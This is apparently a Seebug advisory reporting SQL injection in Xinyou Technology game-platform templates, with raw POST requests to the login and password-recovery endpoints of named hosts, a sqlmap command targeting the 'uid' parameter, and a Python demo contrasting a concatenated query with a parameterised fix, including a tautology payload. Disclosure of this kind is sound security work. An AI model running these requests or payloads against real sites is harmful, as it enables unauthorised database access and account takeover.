Xinyou Technology (信游科技) web game platform templates: multiple SQL injection vulnerabilities

2014-01-14T00:00:00
ID SSV:95089
Type seebug
Reporter Root
Modified 2014-01-14T00:00:00

Description

Brief description:

Multiple SQL injection vulnerabilities exist across the major Xinyou Technology templates; every template is affected.

Details:

1. The login handler does not filter the username parameter `uid`, which leads to SQL injection. To avoid affecting production sites, a test site is used as the example:

[Image sqltest3.jpg: https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg]

sqlmap.py -r "C:\1.txt" -p "uid" --tables

POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1
Host: xy003.52xinyou.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://xy003.52xinyou.cn/index.html
Content-Length: 28
Cookie: xinyoukeji=2055191
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

uid=test&pwd=12345&rem=false

[Image sqltest2.jpg: https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg]

2. The forgot-password function has the same problem with the user account parameter (`username`):

POST /api/webaction.ashx HTTP/1.1
Host: xy006.52xinyou.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://xy006.52xinyou.cn/user/findpass.html
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 152

posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4

[Image sqltest1.jpg: https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg]
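Both findings above share one root cause: a user-supplied account identifier (`uid` at login, `username` at password recovery) is placed into the SQL text without being separated from it. The following is an added illustration, not the vendor's code (the real platform is ASP.NET, the handlers are `.ashx`); it uses a constructed in-memory SQLite table to contrast the string-concatenated lookup with a parameterised one, which is the fix for this vulnerability class.

```python
import sqlite3

# Constructed sample account store standing in for the platform's user table.
# Plaintext pwd is kept only to mirror the login form fields uid/pwd.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('test', '12345')")
    conn.commit()
    return conn

def login_vulnerable(conn, uid, pwd):
    # The defect the advisory describes: uid and pwd are concatenated into the
    # query text, so a quote inside uid changes the query's structure.
    sql = "SELECT uid FROM users WHERE uid = '%s' AND pwd = '%s'" % (uid, pwd)
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, uid, pwd):
    # Parameterised query: the driver binds uid and pwd as data, never as SQL,
    # so the same input is compared literally against the uid column.
    sql = "SELECT uid FROM users WHERE uid = ? AND pwd = ?"
    return conn.execute(sql, (uid, pwd)).fetchone() is not None

def demo():
    conn = make_db()
    # Textbook tautology in the account field with a wrong password; this is
    # the behaviour the advisory's sqlmap run exploits.
    crafted_uid = "test' OR '1'='1"
    return {
        "valid_vuln": login_vulnerable(conn, "test", "12345"),
        "valid_safe": login_safe(conn, "test", "12345"),
        "crafted_vuln": login_vulnerable(conn, crafted_uid, "wrong"),
        "crafted_safe": login_safe(conn, crafted_uid, "wrong"),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

Only `crafted_vuln` accepts the login; the parameterised version rejects the crafted `uid` because it is compared as a literal string.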

Proof of vulnerability:

[Image sqltest2.jpg: https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg]

[Image sqltest1.jpg: https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg]